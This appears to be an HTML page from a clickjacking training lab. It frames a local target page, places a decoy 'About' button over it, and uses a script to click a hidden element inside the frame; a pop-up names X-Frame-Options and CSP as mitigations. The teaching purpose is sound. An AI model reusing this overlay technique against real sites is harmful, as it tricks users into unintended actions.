<!DOCTYPE html>
<html>
<head>
  <title>Clickjacking Demo</title>
  <style>
    #iframe {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      opacity: 1;
    }
    
    #info {
      position: fixed;
      top: -60%;
      left: -45%;
      transform: translate(-50%, -50%);
      width: 18.6%;
      height: 10%;
      z-index: 2;
    }
    
    #overlay {
      position: fixed;
      top: 119%;
      left: 95.7%;
      transform: translate(-50%, -50%);
      width: 90%;
      height: 100%;
      background: transparent;
      z-index: 2;
    }
  </style>
</head>
<body>
  <div id="overlay">
  <div id="info">
    <button type="button" onclick="showLabInfo()">Show Lab INFO</button><br><br>
    <button type="button"><a href="mitigations.html" target="_blank" style="color: black;">Let's Secure IT</a></button>
  </div>
  <button id="attackButton" style="width: 70px;height: 35px;border: none; border-radius: 4px;">About</button>
  </div>
   <iframe id="iframe" src="index.html"></iframe>
   <script>
      function showLabInfo() {
      const labInfo = "Welcome to the Clickjacking Lab!\n\nObjective: Demonstrate a clickjacking attack on a web application's login form.\n\nInstructions:\n1. Open the target page.\n2. Open the attack page.\n3. Observe the clickjacking effect.\n\nMitigation: Use the X-Frame-Options header and Content Security Policy.";
      alert(labInfo);
    }

       document.getElementById("attackButton").addEventListener("click", function() {
           document.getElementById("iframe").contentWindow.document.getElementById("clickjacking").click();
       });
   </script>
</body>
</html>
